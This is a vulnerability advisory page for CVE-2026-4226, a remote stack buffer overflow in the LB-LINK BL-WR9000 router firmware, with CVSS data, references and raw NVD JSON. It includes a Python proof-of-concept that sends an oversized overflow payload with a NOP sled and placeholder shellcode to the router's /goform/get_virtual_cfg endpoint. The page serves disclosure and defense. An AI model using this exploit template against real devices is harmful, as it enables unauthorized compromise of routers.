CVE-2026-4226

Description

A weakness has been identified in LB-LINK BL-WR9000 2.4.9. The affected element is the function sub_44E8D0 of the file /goform/get_virtual_cfg. Executing a manipulation can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:lb-link:bl-wr9000_firmware:2.4.9:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:lb-link:bl-wr9000:-:*:*:*:*:*:*:* - NOT VULNERABLE

LB-LINK BL-WR9000 2.4.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-4226 PoC - LB-LINK BL-WR9000 Stack Buffer Overflow
# Target: LB-LINK BL-WR9000 router
# Endpoint: /goform/get_virtual_cfg

target_ip = "192.168.1.1"  # Router IP
target_port = 80

# Construct malicious payload with oversized input
# The vulnerability is in sub_44E8D0 function
# Sending oversized string triggers stack buffer overflow

def exploit_buffer_overflow():
    url = f"http://{target_ip}:{target_port}/goform/get_virtual_cfg"
    
    # Payload to trigger overflow - 512 bytes padding + return address
    padding = b"A" * 512
    return_addr = b"\x42\x42\x42\x42"  # Placeholder address
    nop_sled = b"\x90" * 100
    shellcode = b"\xcc" * 50  # Int3 breakpoint as placeholder shellcode
    
    payload = padding + return_addr + nop_sled + shellcode
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "admin:language=cn"
    }
    
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=5)
        print(f"Response Status: {response.status_code}")
        print(f"Response Length: {len(response.content)}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")

if __name__ == "__main__":
    print("CVE-2026-4226 PoC for LB-LINK BL-WR9000")
    print("Target: /goform/get_virtual_cfg")
    exploit_buffer_overflow()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4226
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4226
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4226/
[4] VulDB https://vuldb.com/cve/CVE-2026-4226
[5] https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_VirtualRules%20stack%20overflow_EN.md
[6] https://vuldb.com/?ctiid.351149
[7] https://vuldb.com/?id.351149
[8] https://vuldb.com/?submit.771207

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4226", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:15.527", "lastModified": "2026-03-20T18:21:05.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in LB-LINK BL-WR9000 2.4.9. The affected element is the function sub_44E8D0 of the file /goform/get_virtual_cfg. Executing a manipulation can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en LB-LINK BL-WR9000 2.4.9. El elemento afectado es la función sub_44E8D0 del archivo /goform/get_virtual_cfg. Ejecutar una manipulación puede llevar a un desbordamiento de búfer basado en pila. El ataque puede realizarse de forma remota. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lb-link:bl-wr9000_firmware:2.4.9:*:*:*:*:*:*:*", "matchCriteriaId": "0A23AFF5-C85A-4422-933E-02547D9E2859"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lb-link:bl-wr9000:-:*:*:*:*:*:*:*", "matchCriteriaId": "29EAB380-0F6C-4E9A-B7DA-5C36021E4175"}]}]}], "references": [{"url": "https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_ ... (truncated)